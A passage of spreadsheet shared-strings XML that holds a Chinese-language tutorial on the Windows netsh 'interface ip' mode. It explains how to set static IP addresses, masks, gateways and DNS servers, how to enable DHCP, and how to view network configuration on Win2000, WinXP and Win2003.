        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>命令提示符就会变成</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>“</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Interface ip&gt;</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>”（如图</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>1</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>所示），此时你就进入了</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>IP</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>设置模式。在该模式下，你可以利用“</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>set</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>”命令设置网络</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>IP</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>地址、网络掩码、</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>DNS</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>服务器，也可以利用“</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>show</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>”命令，查看各种网络参数，包括与本机建立的各种</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>TCP/IP</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连接等。</t>
    </r>
  </si>
  <si>
    <r>
      <t>设置</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>IP</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>地址：在</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>IP</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>设置模式下，执行“</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>set address name static [addr] [mask] [gateway] [gwmetric]</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>”命令，就能给指定网络连接分配</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>IP</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>地址、掩码地址、网关地址。其中，“</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>set address</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>”是设置</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>IP</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>地址的专用命令，</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>name</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>表示指定的网络连接名称，</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Win2000</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>下的</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>name</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>应设置</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>为“</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Internet</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连接”，</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>WinXP</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>、</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Win2003</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>下的</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>name</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>应设置为“本地连接”；</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>static</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>是表示设置静态地址，“</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>[addr]</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>”指的是具体</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>IP</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>地址，“</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>[mask]</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>”指的是具体掩码地址，“</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>[gateway]</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>”指的是具体网关地址</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>，“</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>[gwmetric]</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>”指的是具体网关跃点数，一般情况下，该数值应设置为“</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>1</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>”。</t>
    </r>
  </si>
  <si>
    <r>
      <t>例如，现在要为局域网中的某</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Win2000</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>工作站，分配一固定</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>IP</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>地址为“</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>10.192.168.10</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>”，同时将该工作站的掩码地址设置为</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>“</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>255.255.255.0</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>”，将网关地址设置为“</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>10.192.168.1</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>”。那么你就可以在</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>IP</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>设置模式下，执行字符</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>串命令“</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>set address Internet</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连接</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> static 10.192.168.10 255.255.255.0 10.192.168.1 1</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>”，要不了多久，系统将会返回“确定”的提示（如图</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>2</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>所示），这表明</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>IP</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>地址设置成功。倘若你是一位拨号用</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>户，需要为自己的计算机分配一个动态</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>IP</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>地址时，就必须在</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>IP</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>设置模式下，输入字符串命令“</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>set address Internet</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连接</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> source=dhcp</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>”，单击回车键后，倘若系统返回“确定”提示，就表示为该计算机成功启用了</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>DHCP</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>服务，以后计算机的</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>IP</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>地址将会自动获取。</t>
    </r>
  </si>
  <si>
    <r>
      <t>设置</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>DNS</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>服务器：在</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>IP</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>设置模式下，你还能为指定的网络连接设置</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>DNS</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>服务器，只要执行“</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>set dns name static [addr]</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>”命令就可以了。其中</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>“</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>set dns</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>”是设置</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>DNS</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>服务器的专用命令，“</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>static</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>”表示设置静态</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>DNS</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>服务器，“</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>[addr]</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>”是具体的</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> DNS</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>服务器</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>IP</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>地址。例如，现在要将当前计算机的</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>DNS</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>服务器，设置为“</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>202.100.100.202</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>”时，那么你</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>可以在</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>IP</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>设置模式下，输入字符串命令“</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>set dns Internet</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连接</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> static 202.100.100.202</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>”，单击回车后，系统将返回“确定”提示，这表明配置静态</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>DNS</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>服务器已经成功。此时，你可以执行“</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">show dns </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>”命令，看看当前计算机的</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>DNS</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>服务器，是否已经被设置成指定的</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>IP</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>地址了，如图</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>3</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>所示。倘若需要为计算机启动动态</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>DNS</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>服务器时，可以执行“</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>set dns Internet</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连接</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> source=dhcp</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>”命令。</t>
    </r>
  </si>
  <si>
    <r>
      <t>查询配置信息：大家知道在</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>DOS</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>环境中，利用“</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Ipconfig</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>”命令，也能查看到当前计算机的网络配置信息，可是该命令查</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>看到的信息很有限，只限于</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
